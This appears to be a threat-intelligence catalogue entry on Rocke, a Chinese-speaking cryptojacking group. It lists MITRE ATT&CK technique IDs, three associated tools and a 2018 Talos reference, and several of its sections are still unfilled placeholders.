Introduction
Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address βrocke@live.cnβ used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed. Talos Rocke August 2018
Activities and Tactics
Information pending cataloguing.
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1190 Exploit Public-Facing Application
- T1014 Rootkit
- T1027 Obfuscated Files or Information
- T1102 Web Service
- T1059.004 Unix Shell
- T1082 System Information Discovery
- T1071 Application Layer Protocol
- T1105 Ingress Tool Transfer
- T1496.001 Compute Hijacking
- T1027.004 Compile After Delivery
- T1574.006 Dynamic Linker Hijacking
- T1564.001 Hidden Files and Directories
- T1053.003 Cron
- T1059.006 Python
- T1046 Network Service Discovery
- T1055.002 Portable Executable Injection
- T1102.001 Dead Drop Resolver
- T1037 Boot or Logon Initialization Scripts
- T1027.002 Software Packing
- T1547.001 Registry Run Keys / Startup Folder
- T1222.002 Linux and Mac Permissions
- T1057 Process Discovery
- T1543.002 Systemd Service
- T1018 Remote System Discovery
- T1686 Disable or Modify System Firewall
- T1140 Deobfuscate/Decode Files or Information
- T1685.006 Clear Linux or Mac System Logs
- T1552.004 Private Keys
- T1070.004 File Deletion
- T1071.001 Web Protocols
- T1685 Disable or Modify Tools
- T1571 Non-Standard Port
- T1021.004 SSH
- T1070.006 Timestomp
- T1036.005 Match Legitimate Resource Name or Location
- T1518.001 Security Software Discovery
ATT&CK technique IDs (denormalized)
- T1014
- T1018
- T1021.004
- T1027
- T1027.002
- T1027.004
- T1036.005
- T1037
- T1046
- T1053.003
- T1055.002
- T1057
- T1059.004
- T1059.006
- T1070.004
- T1070.006
- T1071
- T1071.001
- T1082
- T1102
- T1102.001
- T1105
- T1140
- T1190
- T1222.002
- T1496.001
- T1518.001
- T1543.002
- T1547.001
- T1552.004
- T1564.001
- T1571
- T1574.006
- T1685
- T1685.006
- T1686
Notable Indicators of Compromise (IOCs)
No curated IOCs are currently published for this actor. This section will be updated when stable, attributable indicators are available.
Malware and Tools
- CyberGate:
- Cyber Eye RAT:
- Archelaus Beta:
Attribution and Evidence
Information pending cataloguing.
References
[1] mitre-attack [2] Talos Rocke August 2018 Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.